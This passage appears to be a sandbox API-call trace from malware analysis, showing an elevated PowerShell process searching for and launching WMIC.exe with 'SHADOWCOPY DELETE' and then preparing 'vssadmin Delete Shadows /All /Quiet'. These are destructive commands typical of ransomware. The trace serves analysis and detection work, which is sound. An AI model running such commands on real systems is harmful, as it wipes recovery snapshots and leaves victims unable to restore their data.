lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.029] SetErrorMode (uMode=0x1) returned 0x1 [0129.029] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.029] SetErrorMode (uMode=0x1) returned 0x1 [0129.030] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.030] SetErrorMode (uMode=0x1) returned 0x1 [0129.030] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.030] SetErrorMode (uMode=0x1) returned 0x1 [0129.030] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.031] SetErrorMode (uMode=0x1) returned 0x1 [0129.031] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.031] SetErrorMode (uMode=0x1) returned 0x1 [0129.031] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.031] SetErrorMode (uMode=0x1) returned 0x1 [0129.032] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.032] SetErrorMode (uMode=0x1) returned 0x1 [0129.032] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.032] SetErrorMode (uMode=0x1) returned 0x1 [0129.032] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0129.033] SetErrorMode (uMode=0x1) returned 0x1 [0129.033] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.033] SetErrorMode (uMode=0x1) returned 0x1 [0129.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0129.033] SetErrorMode (uMode=0x1) returned 0x1 [0129.033] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.034] SetErrorMode (uMode=0x1) returned 0x1 [0129.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0129.034] SetErrorMode (uMode=0x1) returned 0x1 [0129.034] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.035] SetErrorMode (uMode=0x1) returned 0x1 [0129.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0129.035] SetErrorMode (uMode=0x1) returned 0x1 [0129.035] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.036] SetErrorMode (uMode=0x1) returned 0x1 [0129.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0129.036] SetErrorMode (uMode=0x1) returned 0x1 [0129.036] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0129.037] SetErrorMode (uMode=0x1) returned 0x1 [0129.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0129.037] SetErrorMode (uMode=0x1) returned 0x1 [0129.037] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c9ad9a0 | out: lpFindFileData=0x1c9ad9a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1ff0a0 [0129.039] FindNextFileW (in: hFindFile=0x1ff0a0, lpFindFileData=0x1c9ad9b0 | out: lpFindFileData=0x1c9ad9b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0129.039] FindClose (in: hFindFile=0x1ff0a0 | out: hFindFile=0x1ff0a0) returned 1 [0129.039] SetErrorMode (uMode=0x1) returned 0x1 [0129.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c9adac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0129.042] SetErrorMode (uMode=0x1) returned 0x1 [0129.042] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c9adcd0 | out: lpFileInformation=0x1c9adcd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0129.043] SetErrorMode (uMode=0x1) returned 0x1 [0129.046] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0129.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0129.046] CoTaskMemFree (pv=0x2af7b0) [0129.050] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0129.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0129.050] CoTaskMemFree (pv=0x2af7b0) [0129.059] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0129.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0129.059] CoTaskMemFree (pv=0x2af7b0) [0129.070] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0129.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0129.070] CoTaskMemFree (pv=0x2af7b0) [0129.096] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0129.098] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c9adeb8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9adeb8) returned 0x4550 [0129.110] CoTaskMemFree (pv=0x1b9b1010) [0129.115] GetConsoleWindow () returned 0x5011e [0129.132] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0129.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0129.132] CoTaskMemFree (pv=0x2af7b0) [0129.134] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0129.134] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.135] CoTaskMemFree (pv=0x2af7b0) [0129.144] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0129.144] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.144] CoTaskMemFree (pv=0x2af7b0) [0129.152] CommandLineToArgvW (in: lpCmdLine=" SHADOWCOPY DELETE", pNumArgs=0x1c9adf00 | out: pNumArgs=0x1c9adf00) returned 0x1b9c86a0*="" [0129.156] lstrlenW (lpString="SHADOWCOPY") returned 10 [0129.159] CoTaskMemAlloc (cb=0x18) returned 0x1b9cc910 [0129.159] RtlMoveMemory (in: Destination=0x1b9cc910, Source=0x1b9c86c2, Length=0x16 | out: Destination=0x1b9cc910) [0129.159] CoTaskMemFree (pv=0x1b9cc910) [0129.159] lstrlenW (lpString="DELETE") returned 6 [0129.159] CoTaskMemAlloc (cb=0x10) returned 0x1b9cc910 [0129.159] RtlMoveMemory (in: Destination=0x1b9cc910, Source=0x1b9c86d8, Length=0xe | out: Destination=0x1b9cc910) [0129.159] CoTaskMemFree (pv=0x1b9cc910) [0129.160] LocalFree (hMem=0x1b9c86a0) returned 0x0 [0129.161] CoTaskMemAlloc (cb=0x804) returned 0x1b9d71a0 [0129.161] GetConsoleTitleW (in: lpConsoleTitle=0x1b9d71a0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0129.162] CoTaskMemFree (pv=0x1b9d71a0) [0129.179] CoTaskMemAlloc (cb=0x8c) returned 0x24df60 [0129.179] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c9ade60*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31d0830 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE", lpProcessInformation=0x31d0830*(hProcess=0x384, hThread=0x35c, dwProcessId=0xb74, dwThreadId=0xb18)) returned 1 [0129.189] CoTaskMemFree (pv=0x24df60) [0129.541] CloseHandle (hObject=0x35c) returned 1 [0129.541] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0129.541] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c9adf08, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9adf08) returned 0x4550 [0129.543] CoTaskMemFree (pv=0x1b9b1010) [0129.547] GetCurrentProcess () returned 0xffffffffffffffff [0129.548] GetCurrentProcess () returned 0xffffffffffffffff [0129.554] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c9adfe8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c9adfe8*=0x35c) returned 1 [0238.330] CloseHandle (hObject=0x35c) returned 1 [0238.337] GetExitCodeProcess (in: hProcess=0x384, lpExitCode=0x1c9ae058 | out: lpExitCode=0x1c9ae058*=0x0) returned 1 [0238.344] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0238.350] CloseHandle (hObject=0x384) returned 1 [0238.364] SetEvent (hEvent=0x350) returned 1 [0238.364] SetEvent (hEvent=0x344) returned 1 [0238.364] SetEvent (hEvent=0x348) returned 1 [0238.364] SetEvent (hEvent=0x34c) returned 1 [0238.365] SetEvent (hEvent=0x368) returned 1 [0238.365] SetEvent (hEvent=0x3b0) returned 1 [0238.365] SetEvent (hEvent=0x360) returned 1 [0238.365] SetEvent (hEvent=0x364) returned 1 [0238.365] SetEvent (hEvent=0x36c) returned 1 [0238.366] CoUninitialize () Thread: id = 114 os_tid = 0x9e0 [0238.443] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0238.446] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0238.451] VirtualQuery (in: lpAddress=0x1c94d920, lpBuffer=0x1c94e7e0, dwLength=0x30 | out: lpBuffer=0x1c94e7e0*(BaseAddress=0x1c94d000, AllocationBase=0x1bfc0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0238.460] VirtualQuery (in: lpAddress=0x1c94dbd0, lpBuffer=0x1c94ea90, dwLength=0x30 | out: lpBuffer=0x1c94ea90*(BaseAddress=0x1c94d000, AllocationBase=0x1bfc0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0238.473] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0238.473] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0238.474] CoTaskMemFree (pv=0x2af7b0) [0238.474] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0238.474] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0238.474] CoTaskMemFree (pv=0x2af7b0) [0238.475] CoTaskMemAlloc (cb=0x20e) returned 0x2bbde0 [0238.475] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bbde0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0238.475] CoTaskMemFree (pv=0x2bbde0) [0238.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0238.476] SetErrorMode (uMode=0x1) returned 0x1 [0238.477] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\vssadmin.ps1", lpFindFileData=0x1c94db00 | out: lpFindFileData=0x1c94db00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0238.477] SetErrorMode (uMode=0x1) returned 0x1 [0238.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0238.478] SetErrorMode (uMode=0x1) returned 0x1 [0238.478] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\vssadmin.psm1", lpFindFileData=0x1c94db00 | out: lpFindFileData=0x1c94db00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0238.478] SetErrorMode (uMode=0x1) returned 0x1 [0238.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0238.478] SetErrorMode (uMode=0x1) returned 0x1 [0238.479] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\vssadmin.psd1", lpFindFileData=0x1c94db00 | out: lpFindFileData=0x1c94db00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0238.479] SetErrorMode (uMode=0x1) returned 0x1 [0238.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0238.479] SetErrorMode (uMode=0x1) returned 0x1 [0238.479] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", lpFindFileData=0x1c94db00 | out: lpFindFileData=0x1c94db00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0238.480] SetErrorMode (uMode=0x1) returned 0x1 [0238.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0238.480] SetErrorMode (uMode=0x1) returned 0x1 [0238.480] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", lpFindFileData=0x1c94db00 | out: lpFindFileData=0x1c94db00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2f501b5, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd2f501b5, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xfa124bf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x28e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="vssadmin.exe", cAlternateFileName="")) returned 0x1feb60 [0238.480] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c94db10 | out: lpFindFileData=0x1c94db10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2f501b5, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd2f501b5, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xfa124bf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x28e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="vssadmin.exe", cAlternateFileName="")) returned 0 [0238.481] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0238.481] SetErrorMode (uMode=0x1) returned 0x1 [0238.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", nBufferLength=0x105, lpBuffer=0x1c94dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\vssadmin.exe", lpFilePart=0x0) returned 0x20 [0238.481] SetErrorMode (uMode=0x1) returned 0x1 [0238.482] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c94de30 | out: lpFileInformation=0x1c94de30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2f501b5, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd2f501b5, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xfa124bf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x28e00)) returned 1 [0238.482] SetErrorMode (uMode=0x1) returned 0x1 [0238.483] CoTaskMemAlloc (cb=0x22) returned 0x1b9b1010 [0238.483] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\vssadmin.exe", dwFileAttributes=0x0, psfi=0x1c94e018, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c94e018) returned 0x4550 [0238.488] CoTaskMemFree (pv=0x1b9b1010) [0238.488] GetConsoleWindow () returned 0x5011e [0238.489] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0238.489] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0238.489] CoTaskMemFree (pv=0x2af7b0) [0238.490] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0238.491] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0238.491] CoTaskMemFree (pv=0x2af7b0) [0238.491] CommandLineToArgvW (in: lpCmdLine=" Delete Shadows /All /Quiet", pNumArgs=0x1c94e060 | out: pNumArgs=0x1c94e060) returned 0x1b9a5fa0*="" [0238.491] lstrlenW (lpString="Delete") returned 6 [0238.491] CoTaskMemAlloc (cb=0x10) returned 0x1b9cc850 [0238.491] RtlMoveMemory (in: Destination=0x1b9cc850, Source=0x1b9a5fd2, Length=0xe | out: Destination=0x1b9cc850) [0238.491] CoTaskMemFree (pv=0x1b9cc850) [0238.491] lstrlenW (lpString="Shadows") returned 7 [0238.491] CoTaskMemAlloc (cb=0x12) returned 0x1b9cc850 [0238.491] RtlMoveMemory (in: Destination=0x1b9cc850, Source=0x1b9a5fe0, Length=0x10 | out: Destination=0x1b9cc850) [0238.491] CoTaskMemFree (pv=0x1b9cc850) [0238.491] lstrlenW (lpString="/All") returned 4 [0238.491] CoTaskMemAlloc (cb=0xc) returned 0x1b9cc850 [0238.491] RtlMoveMemory (in: Destination=0x1b9cc850, Source=0x1b9a5ff0, Length=0xa | out: Destination=0x1b9cc850) [0238.491] CoTaskMemFree (pv=0x1b9cc850) 